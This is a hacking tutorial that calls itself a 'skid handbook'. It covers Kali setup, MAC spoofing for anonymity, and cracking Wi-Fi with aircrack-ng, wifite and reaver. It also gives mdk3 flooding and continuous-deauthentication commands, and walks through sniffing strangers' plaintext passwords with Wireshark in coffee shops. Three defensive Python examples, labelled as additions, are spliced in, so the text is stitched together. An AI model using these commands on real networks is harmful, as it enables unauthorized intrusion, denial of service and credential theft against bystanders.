skidhandbook-r-2-21-2015

Upload: buck-roberts

Post on 15-Jul-2015

Keyboard shortcuts

If you've used other Linux distributions you are used to having CTRL + ALT + T open a terminal. You've probably already noticed that the terminal shortcut is not enabled by default. Let's go ahead and fix this before we do anything else. Open System Tools >> Preferences >> System Settings.

Select Keyboard from the System Settings GUI.

Select Shortcuts.

Select Custom Shortcuts.

Click the plus sign.

Now let's add our shortcut for the terminal. You can name your shortcuts whatever you want. I'm going to call mine Terminal. The command for the shortcut is the command you would type in the shell to launch the program, in this case gnome-terminal.

gnome-terminal

One last step. Select the shortcut you have created and add the accelerator by pressing the key combination you want to use to open the shortcut.


Let's test it out. Hold CTRL + ALT and press T.

Notes

Proxy settings

Add the proxy exports to /etc/bash.bashrc, one per line:

export ftp_proxy="ftp://user:password@proxyIP:port"
export http_proxy="http://user:password@proxyIP:port"
export https_proxy="https://user:password@proxyIP:port"
export socks_proxy="socks://user:password@proxyIP:port"

Then add the matching entries to /etc/apt/apt.conf:

Acquire::ftp::proxy "ftp://user:password@IP:port";
Acquire::http::proxy "http://user:password@IP:port";
Acquire::https::proxy "https://user:password@IP:port";
Acquire::socks::proxy "socks://user:password@IP:port";

Save the file, then log out and log back in for the proxy settings to take effect. Note that both files are readable by every user on the system, so the proxy password is too.

Configure SSH

Generate new host keys. Kali comes with default SSH host keys, so you'll want to back them up before you make new ones.

cd /etc/ssh/
mkdir keys_default
mv ssh_host_* keys_default
dpkg-reconfigure openssh-server

MD5 checksums (compare the new keys against the backed-up ones to confirm they actually changed)

md5sum ssh_host_*
cd keys_default
md5sum *

cd
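The backup and checksum steps above, automated together with the check they leave implicit: that the keys written by dpkg-reconfigure openssh-server really differ from the stock ones. This is an added example and not part of the handbook. It takes the directories as parameters so it can be tried in a scratch directory; on a real system it would be pointed at /etc/ssh and /etc/ssh/keys_default, with the regeneration itself still done by dpkg-reconfigure (this script does not generate keys). SHA-256 is used in place of the handbook's md5sum; either is fine for a did-it-change comparison.

```python
"""Archive stock SSH host keys and verify that regenerated keys differ.

Added example (not from the handbook). archive_host_keys() is the
`mkdir keys_default; mv ssh_host_* keys_default` step; verify_regenerated()
is the checksum comparison, returning a status per key instead of two
lists of digests to eyeball. Paths are parameters; the demo uses a
temporary directory with constructed key files.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def digest(path: Path) -> str:
    """Hex SHA-256 of a file's contents (md5sum on the page; any hash works here)."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def archive_host_keys(ssh_dir: Path, backup_dir: Path) -> dict:
    """Move every ssh_host_* file out of ssh_dir into backup_dir.

    Returns {filename: digest} for the archived keys so the caller can
    later prove that the regenerated files are different.
    """
    backup_dir.mkdir(parents=True, exist_ok=True)
    archived = {}
    for key in sorted(ssh_dir.glob("ssh_host_*")):   # non-recursive: backup dir is skipped
        if not key.is_file():
            continue
        archived[key.name] = digest(key)
        shutil.move(str(key), str(backup_dir / key.name))
    return archived


def verify_regenerated(ssh_dir: Path, archived: dict) -> dict:
    """Compare the current ssh_host_* files against the archived digests.

    Status per key: 'new' (present and different from the archived copy),
    'unchanged' (same bytes as the stock key: regeneration did not happen),
    'missing' (no replacement file was written at all).
    """
    report = {}
    for name, old in archived.items():
        current = ssh_dir / name
        if not current.is_file():
            report[name] = "missing"
        elif digest(current) == old:
            report[name] = "unchanged"
        else:
            report[name] = "new"
    return report


def rotation_ok(report: dict) -> bool:
    """True only if every archived key has a genuinely new replacement."""
    return bool(report) and all(status == "new" for status in report.values())


def demo(outcome: str = "fresh") -> dict:
    """Run the flow in a scratch directory with constructed key files.

    outcome: 'fresh' -> new key bytes are written (what dpkg-reconfigure should do)
             'same'  -> the stock bytes come back (regeneration silently failed)
             'none'  -> nothing is written (no replacement generated)
    """
    with tempfile.TemporaryDirectory() as tmp:
        ssh = Path(tmp)
        stock = {"ssh_host_rsa_key": b"stock-private-key",      # constructed, not real keys
                 "ssh_host_rsa_key.pub": b"stock-public-key"}
        for name, data in stock.items():
            (ssh / name).write_bytes(data)
        archived = archive_host_keys(ssh, ssh / "keys_default")
        for name, data in stock.items():          # stand-in for dpkg-reconfigure openssh-server
            if outcome == "fresh":
                (ssh / name).write_bytes(b"fresh-" + data)
            elif outcome == "same":
                (ssh / name).write_bytes(data)
        return verify_regenerated(ssh, archived)


if __name__ == "__main__":
    for outcome in ("fresh", "same", "none"):
        report = demo(outcome)
        print(outcome, report, "OK" if rotation_ok(report) else "ROTATION FAILED")
```

On a live box the sequence is: archive_host_keys(Path("/etc/ssh"), Path("/etc/ssh/keys_default")), run dpkg-reconfigure openssh-server, then verify_regenerated() with the returned dict; anything other than all 'new' means the host is still presenting a key that every other default install shares.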

Start SSH

/etc/init.d/ssh start

Have a look at your listening services with this command:

netstat -antp

Stop SSH

/etc/init.d/ssh stop

Checking repositories

Source repositories can be edited in /etc/apt/sources.list.

echo deb http://http.kali.org/kali kali main contrib non-free >> /etc/apt/sources.list

You can check your installed packages with dpkg -l

dpkg -l > list.txt

If you want to see if a particular tool is installed use:

dpkg -l | grep <toolname>

Example:

dpkg -l | grep aircrack-ng

Get updates and upgrades

To update your system.


apt-get update

To install upgrades

apt-get upgrade

There might be a newer version of Kali available. If there is we'll go ahead and upgrade our operating system with the following command.

apt-get dist-upgrade

You can do all of this with one command.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Update Metasploit

msfupdate

Update Exploitdb Manually

cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvjf archive.tar.bz2
rm archive.tar.bz2

Enable A Firewall

We'll go ahead and install UFW (Uncomplicated Firewall).

apt-get install ufw

Now we'll enable the firewall.

ufw enable

Change your root password

passwd root

Create a non-root user

We'll use the adduser command to make a non-root user on the system. Example:

adduser donkeypuncher


Speeding things up

Preload will load commonly used binaries and dependencies into memory. It will work after the first time you restart your system.

apt-get install preload

Bleachbit

Bleachbit is a tool for cleaning unneeded files from your system such as cookies, temp files, and other junk. It will also wipe your swap space.

apt-get install bleachbit

Run bleachbit from the command line.

bleachbit

Conserving system resources with BUM

Boot-up Manager (BUM) is a program that will allow you to easily manage programs that run at start time. You can choose what programs will run at start time to improve performance and conserve system resources.

To install BUM

apt-get install bum

To run BUM

bum

BUM will open a GUI. This is pretty easy. I'm not going to insult your intelligence by explaining it.


Before you can access any computers you'll have to have access to a network that has computers on it. In this chapter I will talk about ways of accessing wireless networks. There's a legal disclaimer that goes along with this: accessing networks which you don't have permission to use is illegal. That being said, let's begin.

Probably the easiest way to get anonymous network access is to go to a coffee shop. It's pretty commonplace to see people sitting in coffee shops doing work on their laptop or checking emails on a cell phone. You are not likely to be noticed unless you are blatant about what you are doing. Caffeine helps with wakefulness anyway. This is a win-win situation.

The very first command you're going to have to use is ifconfig. The output will look something like this.

root@localhost:~# ifconfig
eth0      Link encap:Ethernet  HWaddr e4:25:3d:de:67:1d
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:19

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:9111 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9111 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2205169 (2.1 MiB)  TX bytes:2205169 (2.1 MiB)

wlan0     Link encap:Ethernet  HWaddr 58:74:da:5b:4e:2c
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:41843 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30245 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:44150260 (42.1 MiB)  TX bytes:5793899 (5.5 MiB)


You'll notice there are 3 interfaces listed. wlan0 is our wireless interface in this instance. On your machine it might be something along the lines of ath0 or wifi0, but it should be easy for you to figure out. You may have more or fewer interfaces depending on what networking devices you have plugged into your computer. If you are in the habit of cracking wifi on penetration testing jobs you will probably want a USB wireless dongle. Then you can disable your internal wireless card and just use the USB device. Anyhow, you might want to change the MAC address of your wireless device for anonymity purposes. You can do this with macchanger. First though we will have to bring our wireless interface down with ifconfig.

ifconfig wlan0 down

Now that our wireless interface is down we can change our MAC address with macchanger. I'll be using the random option -r to change my MAC to a new random MAC address.

macchanger -r wlan0

Now you'll need to bring the wireless interface back up with the following.

ifconfig wlan0 up

You may want to set the MAC address manually by using the -m option (long form --mac=). The Xs represent hexadecimal digits (0-9 and a-f).

macchanger --mac=XX:XX:XX:XX:XX:XX wlan0

If you want a list of vendor prefixes for MAC addresses you can use the -l option.

macchanger -l

There are currently 39 listings for wireless MAC address prefixes and about 14699 non-wireless prefixes. Wireless MACs are listed here:

Wireless MACs:
Num    MAC        Vendor
---    ---        ------
0000 - 00:00:8f - Raytheon Raylink/WebGear Aviator2.4
0001 - 00:00:f0 - Samsung MagicLan (+ some other PrismII cards)
0002 - 00:00:f1 - Raytheon Raylink/WebGear Aviator2.4
0003 - 00:01:03 - 3Com 3CRWE62092A
0004 - 00:02:2d - Lucent (WaveLAN, Orinoco, Silver/Gold), Orinoco (Silver, PC24E), Buffalo and Avaya
0005 - 00:02:6f - Senao SL-2011CD
0006 - 00:02:78 - Samsung MagicLan (+ some other PrismII cards)
0007 - 00:02:a5 - Compaq WL110
0008 - 00:03:2f - Linksys WPC11, Repotec GL241101
0009 - 00:04:5a - Linksys WPC11, WUSB11
0010 - 00:04:75 - 3Com 3CRWE62092B
0011 - 00:04:e2 - SMC SMC2632W
0012 - 00:05:5d - D-Link DWL-650, DWL-650H
0013 - 00:06:25 - Linksys WPC11 v2.5, D-Link DCF-650W, Linksys WPC11 v3
0014 - 00:07:0e - Cisco AIR-PCM352
0015 - 00:07:50 - Cisco AIR-LMC352
0016 - 00:08:21 - Cisco AIR-PCM352
0017 - 00:09:43 - Cisco AIR-LMC352
0018 - 00:09:5b - Netgear MA701, MA401RA
0019 - 00:09:7c - Cisco AIR-LMC352
0020 - 00:09:e8 - Cisco AIR-LMC352
0021 - 00:0a:41 - Cisco AIR-PCM352
0022 - 00:0a:8a - Cisco AIR-PCM352
0023 - 00:30:65 - Apple Airport Card 2002
0024 - 00:30:ab - Netgear MA401
0025 - 00:30:bd - Belkin F5D6020
0026 - 00:40:96 - Cisco AIR-PC4800, 350, AIR-PCM340, AIR-PCM352
0027 - 00:50:08 - Compaq WL100
0028 - 00:50:da - 3Com 3CRWE73796B
0029 - 00:60:01 - Lucent WaveLAN Silver
0030 - 00:60:1d - Lucent WaveLAN Bronze, WaveLAN Gold, Silver, Orinoco Gold
0031 - 00:60:6d - Cabletron CSIBB-AA
0032 - 00:60:b3 - SMC SMC2642W
0033 - 00:80:c7 - Netwave (Xircom Netwave/Netwave Airsurfer)
0034 - 00:90:d1 - LeArtery SyncByAir LN101
0035 - 00:a0:f8 - Symbol Spectrum24
0036 - 00:0c:f1 - Intel Pro 2100
0037 - 00:e0:29 - OEM OEM
0038 - 08:00:0e - Old Lucent Wavelan
0039 - 08:00:46 - Sony PCWA-C10

You can find more about macchanger by reading the man page.

man macchanger

Links:
http://psg.mtu.edu/pub/gnu/macchanger/
http://alobbs.com/

At this point you'll want to connect to a network if you can. If you don't have the wireless password there are a few ways to get it. Keep in mind that it is illegal to penetrate networks you do not have permission to access. For this tutorial we are going to be using wifite. It's the easiest wireless auditing tool there is. It makes use of tools you already have installed like aircrack-ng and reaver. Wifite will start up and start finding wireless networks. It will make a menu and you can select from the available wireless networks to crack. Enter a selection or select all and press [Enter]. Wifite will try to capture a handshake and crack it. If it is unsuccessful it will run a WPS PIN search. More information can be found here: https://code.google.com/p/wifite/

In the terminal, run wifite:

wifite


root@localhost:~# wifite

[WiFite v2 (r85) ASCII-art banner: "automated wireless auditor", "designed for Linux"]

[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:03] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  DonkeyPunchRodeo       1  WPA2  49db   wps   clients
    2  Your_Mom               6  WPA2  30db   no
    3  <Length 9>             1  WEP   29db   no
    4  Dirty_College_Girl     3  WPA2  22db   wps
    5  SSID2                 11  WPA   21db   no
    6  NotACrackHouse         6  WPA2  20db   wps

Let wifite scan for access points and connected clients a few seconds then press CTRL+C and you will see something like this:

[+] select target numbers (1-16) separated by commas, or 'all':

Enter the number of the target you would like to audit and press [Enter]

Wifite may or may not ask a few more questions, and then it will crack some wifi. Note that you will have to have a wireless card that supports monitor mode and packet injection for this to work. If you would like to know more you can visit these sites:
http://www.aircrack-ng.org
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
http://wireless.kernel.org/en/users/Download/stable/

Patching wireless drivers isn't in the scope of this manual. Basically, if your wireless device doesn't support monitoring and injection you will need to purchase one that does. It's better to spend $20-100 on a new wireless card or USB dongle than to spend hours looking up compatibility information and trying to patch drivers. Patching drivers is more technical than most of the stuff I'm going to talk about in this book.

If you don't have packet injection but your wireless card will support monitor mode you can still crack WPA with aircrack-ng. You won't be able to force a deauthentication and capture the handshake when the client reauthenticates. You will have to wait until a client logs in. If you are trying to get a handshake from a fairly busy network this might only take a few minutes. We covered wifite earlier in this section; now we'll go over some tools that are a little more manual.

Rather than overloading you with information you really don't need in order to use the tool, I'm just going to do a basic walkthrough and explain each command step by step. In this tutorial I'm using the Desktop as my working directory. This is a good practice if you are a Linux newb and you have limited knowledge of the Linux file system. I've been using Linux for a long time and I am familiar with the file system, but old habits die hard. First things first.

cd Desktop

Drop your wireless interface.

ifconfig wlan0 down

Change your MAC addresses

macchanger -r wlan0

Put wireless card back up

ifconfig wlan0 up

Next we are going to put our wireless card into monitor mode (often loosely called promiscuous mode, though strictly speaking the two are different things).

airmon-ng start wlan0

Now we'll get a look at the available wireless networks within antenna range with airodump-ng.

airodump-ng mon0

Let airodump do its thing for a little while. Then stop it with CTRL + C.

Copy the BSSID, ESSID and other important information into a text file, as you will need this information for aircrack-ng.

Next we will run airodump-ng again and we will attempt to capture a handshake when a client logs in on the wireless access point. We will be adding in the -w option to write airodump-ng to a capture file. In this case the file will be called coolguy.

airodump-ng -w coolguy mon0

Wait for a client to log in on the wireless access point and collect the handshake. If you don't like to wait you can use aireplay-ng to force a deauthentication. To request a deauthentication issue the following command:

aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0

I'm going to give you the breakdown of this command and its options. -0 is a deauthentication request, and the 1 directly following it is the number of requests that will be sent. -a is the access point MAC address. -c is the client that is connected to the wireless access point (-a for access point, -c for client). Finally wlan0 is the name of our interface.

One deauthentication request usually does the trick. If you fail to deauthenticate the client and capture a handshake you can run the command again. You have to wait several seconds for aireplay to do its thing. You can't just run 100 consecutive deauthentications against a client; you have to allow the client time to reauthenticate itself on the access point. Of course you can also run a continuous deauthentication attack that will result in a denial of service condition for the wireless client. Don't do it. It's super annoying and it will also alert wireless users to suspicious activity on the wireless network.

Also note that authentication requests can be captured by anyone running a monitor device within wireless antenna range. Wifi ranges can be extended to several miles. So don't think there's nobody watching the airwaves just because you can't see them or they are not logged in on the target network.
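The two paragraphs above say that a deauthentication run is noisy and that someone may be watching the airwaves. This added example (not from the handbook) shows what that watching looks like from the defender's side: a small wireless-IDS check that parses raw 802.11 management frames and alerts on a BSSID whose deauthentication or disassociation count inside a sliding window crosses a threshold. It assumes the frames arrive with the radiotap header already stripped, as a monitor-mode capture tool can provide; the frame builder, the sample traffic, and the locally administered 02:... addresses are all constructed for the demo.

```python
"""Detect 802.11 deauthentication floods in a stream of raw frames.

Added example, not from the handbook. Input is (timestamp, raw 802.11
frame) pairs, the kind of stream a monitor-mode capture yields once the
radiotap header is removed. Legitimate disconnects are sparse; a flood is
many deauth/disassoc frames from one BSSID in a short window, usually to
the broadcast address. The demo traffic is constructed.
"""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT = 0                    # frame type: management
DEAUTH, DISASSOC = 12, 10   # management subtypes of interest


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def _raw(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def parse_frame(frame: bytes):
    """Return (ftype, subtype, addr1, addr2, addr3, reason) or None if too short.

    MAC header: frame control (2) | duration (2) | addr1 (6) | addr2 (6) |
    addr3 (6) | sequence control (2). Deauth and disassoc bodies begin with
    a 2-byte little-endian reason code. Frame control bits: 0-1 version,
    2-3 type, 4-7 subtype.
    """
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    addr1, addr2, addr3 = _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22])
    reason = None
    if ftype == MGMT and subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return ftype, subtype, addr1, addr2, addr3, reason


def build_frame(ftype, subtype, addr1, addr2, addr3, reason=None) -> bytes:
    """Constructed helper for the demo: a minimal frame with the given header."""
    fc = bytes([(subtype << 4) | (ftype << 2), 0x00])
    frame = fc + b"\x00\x00" + _raw(addr1) + _raw(addr2) + _raw(addr3) + b"\x00\x00"
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


def detect_deauth_floods(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame).

    Returns one alert dict per BSSID whose deauth/disassoc count inside
    any `window`-second span reaches `threshold`.
    """
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        ftype, subtype, addr1, _addr2, addr3, reason = parsed
        if ftype == MGMT and subtype in (DEAUTH, DISASSOC):
            per_bssid[addr3].append((ts, addr1, reason))
    alerts = []
    for bssid, events in per_bssid.items():
        events.sort(key=lambda e: e[0])
        peak, start = 0, 0
        for i, (ts, _, _) in enumerate(events):
            while events[start][0] < ts - window:   # slide the window forward
                start += 1
            peak = max(peak, i - start + 1)
        if peak >= threshold:
            alerts.append({
                "bssid": bssid,
                "peak_in_window": peak,
                "total": len(events),
                "broadcast": sum(1 for _, dst, _ in events if dst == BROADCAST),
                "reasons": sorted({r for _, _, r in events if r is not None}),
            })
    return alerts


def demo():
    """Constructed capture: beacons, a few normal disconnects, and one flood."""
    ap_a, ap_b, client = "02:00:00:00:aa:01", "02:00:00:00:aa:02", "02:00:00:00:cc:01"
    frames = []
    for i in range(30):                      # ordinary beacons (subtype 8) from both APs
        frames.append((i * 0.1024, build_frame(MGMT, 8, BROADCAST, ap_a, ap_a)))
        frames.append((i * 0.1024, build_frame(MGMT, 8, BROADCAST, ap_b, ap_b)))
    for ts in (5.0, 70.0, 140.0):            # one client leaving ap_b now and then
        frames.append((ts, build_frame(MGMT, DEAUTH, client, ap_b, ap_b, 3)))
    for i in range(20):                      # 20 broadcast deauths in 2 seconds from ap_a
        frames.append((50.0 + i * 0.1, build_frame(MGMT, DEAUTH, BROADCAST, ap_a, ap_a, 7)))
    return detect_deauth_floods(frames)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The sparse disconnects from the second access point never reach the threshold, so only the flooded BSSID is reported; the broadcast count and the reason codes are included because a burst of broadcast deauths with a single reason code is the signature of a tool, not of clients leaving.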

If you are successful in capturing a handshake airodump-ng will show a message at the top right hand side of the screen that says handshake captured. Once you have captured the handshake you can press CTRL + C to stop airodump-ng.

Now that we have captured a handshake we can crack the wireless password with aircrack-ng. In this case we'll be running a dictionary attack against the wireless password.

aircrack-ng -e Fuck_The_Police -b 00:22:3F:0B:A0:1E -w /root/Desktop/rockyou.txt /root/Desktop/coolguy-01.cap

Let's have a close look at this command. The -e option is the ESSID (the name of the network), in this case Fuck_The_Police. -b is the MAC address of the access point. -w is the path to our wordlist, /root/Desktop/rockyou.txt. Finally aircrack will need the path to our capture file, /root/Desktop/coolguy-01.cap.

When aircrack-ng finishes doing its thing you will get one of two results: key found or key not found. The output in the terminal will look something like this.

I have shown you how to crack a WPA key with aircrack-ng. Aircrack is great for running dictionary attacks against WPA keys. Now let's look at running a brute force attack against Wi-Fi Protected Setup (WPS) with reaver. A WPS PIN attack is very simple. In fact it's probably one of the easiest hacks there is. We already know to change our MAC address or use a USB device so as not to give away information about our computer, so I'll not cover that again.

Start by putting our wireless device into monitor mode.

airmon-ng start wlan0

Now let's find some information about the wireless access point we will be attacking. We will need the MAC address of the AP and the channel it is running on.

airodump-ng mon0

Let airodump run long enough for the access point information to become available. Press CTRL + C to stop airodump. Now we will run wash, a Wi-Fi Protected Setup scanner.

wash -i mon0

We see our access point has WPS enabled and it's not locked. Let's go ahead and brute-force the WPS PIN with reaver. Let's look at this basic reaver command. -i is our monitor mode interface (in this case mon0). -c is the channel our access point is communicating on. -b is the access point MAC address. -vv is the very verbose option. If reaver has problems with the PIN search it will tell us through the verbose output.

reaver -i mon0 -c 5 -b 00:22:3F:0B:A0:1E -vv

Our access point might be a little more picky than this. Here is a WPS PIN search with some more complicated options.

reaver -i mon0 -c 5 -b 00:22:3F:0B:A0:1E -vv -L -N -d 15 -T .5 -r 3:15

For more clarification on these commands see the man page.

man reaver

And you can find advanced options with the help option.

reaver -h

While we're talking about reaver let's also cover MDK3 attacks. Here are some basic MDK3 attacks. You can cause the router to reset with MDK3; this will also reset WPS lockouts.

We can flood the access point with fake clients.

mdk3 mon0 a -a 00:22:3F:0B:A0:1E -m

We can cause all of the wireless traffic to shut down if the access point supports TKIP or AES+TKIP.

mdk3 mon0 d -b blacklist -c X

This command will deauthenticate continuously. You will need to make a blank text file in your root folder named blacklist.

Flood clients with a bunch of fake access points. This is effective on Windows devices and a few others.

mdk3 mon0 b -t 00:22:3F:0B:A0:1E -c

Another option:

mdk3 mon0 m -t 00:22:3F:0B:A0:1E

You can actually be running 5 different terminal windows at the same time right now: airodump, mdk3 a, mdk3 b, mdk3 d, and mdk3 m.

To check if the AP has reset run:

wash -i mon0 -C


Capturing Passwords

Let's talk about capturing plain text passwords with Wireshark. You can start Wireshark from the terminal with this command:

wireshark

Or you can open it from the menu. Your Linux desktop environment might be a little different from mine.

You should see the Wireshark GUI now. You might get a warning when the program opens. Just continue past it. It's not a big deal. Everything usually works.


The first thing we will want to do is select our interface.

Once you have selected the interface you want click on the start button.


Now wireshark is running. You can get a lot of information with wireshark. There are something like 800 protocols supported by wireshark. There are a lot of filters. There are some books on packet analysis and all of the uses of wireshark.

If you would like to know more about wireshark visit https://www.wireshark.org/

Let's apply a filter. Click in the filter text box and enter

http


Now that we have Wireshark running and filtering http traffic we can just sit back, drink a coffee and wait for our targets to log in to some websites that are not protected by SSL. Wireshark will show us the passwords. Ok, so we've waited a few minutes and the target has logged into a website.

Let's see if we have successfully collected the target's login credentials. We can check by clicking the edit tab and selecting Find Packets from the drop down menu.


We'll get one more GUI form to select some stuff. We're going to select String by clicking the radio button next to the word String at the top.

Then we'll select Packet Bytes by selecting the radio button.


Next we'll need to enter post into the text box.

post

Now click the find button.


We should see some highlighted packets. Click on one of them and see what it says.

Scroll to the bottom and click the plus sign next to Line-based text data:


There's your plain text username and password.
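The Wireshark walkthrough above finds the POST that carried a login over plain HTTP. This added example (not from the handbook) does the same search from the site owner's side, as the check that tells you which of your own endpoints still accept credentials without SSL/TLS: it parses raw HTTP requests, flags form POSTs whose field names look like credentials, and reports only host, path and field names, never the submitted values. The request format and the parsing are standard HTTP/1.x; the host names, paths and requests are constructed for the demo, and a real feed would come from a capture or a proxy log.

```python
"""Flag credential submissions over cleartext HTTP, reporting fields, not values.

Added example, not from the handbook. audit_request() takes one raw
HTTP/1.x request plus a flag saying whether the connection was TLS; the
finding it returns names the endpoint and the credential-looking field
names so the endpoint can be moved behind TLS. Submitted values are
deliberately discarded. The sample requests below are constructed.
"""
from urllib.parse import parse_qsl

# Form field names that usually carry a secret (extend to taste).
CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass", "pin", "token", "secret"}


def parse_http_request(raw: bytes):
    """Split one raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def audit_request(raw: bytes, tls: bool):
    """Return a finding for a form POST carrying credential-like fields over a
    non-TLS connection, else None. Only field names are kept, never values."""
    method, path, headers, body = parse_http_request(raw)
    if tls or method != "POST":
        return None
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    names = {name.lower() for name, _value in parse_qsl(body.decode("latin-1"), keep_blank_values=True)}
    hits = sorted(names & CREDENTIAL_FIELDS)
    if not hits:
        return None
    return {"host": headers.get("host", "<no host header>"), "path": path, "fields": hits}


def audit_stream(requests):
    """requests: iterable of (raw_request_bytes, over_tls). Returns all findings."""
    return [f for f in (audit_request(raw, tls) for raw, tls in requests) if f]


def demo():
    """Constructed traffic: a cleartext login, the same login over TLS, a PIN form,
    a harmless search POST and a GET. Hosts use the reserved .example domain."""
    login = (b"POST /login HTTP/1.1\r\nHost: shop.example\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             b"username=alice&password=hunter2")
    pin = (b"POST /verify HTTP/1.1\r\nHost: bank.example\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
           b"pin=1234&remember=1")
    search = (b"POST /search HTTP/1.1\r\nHost: shop.example\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n\r\nq=coffee")
    page = b"GET /index.html HTTP/1.1\r\nHost: shop.example\r\n\r\n"
    return audit_stream([(login, False), (login, True), (pin, False),
                         (search, False), (page, False)])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The TLS copy of the login and the search form produce nothing; the two cleartext credential posts are reported by endpoint and field name only, which is the list a site owner needs to act on without the audit itself becoming a store of harvested passwords.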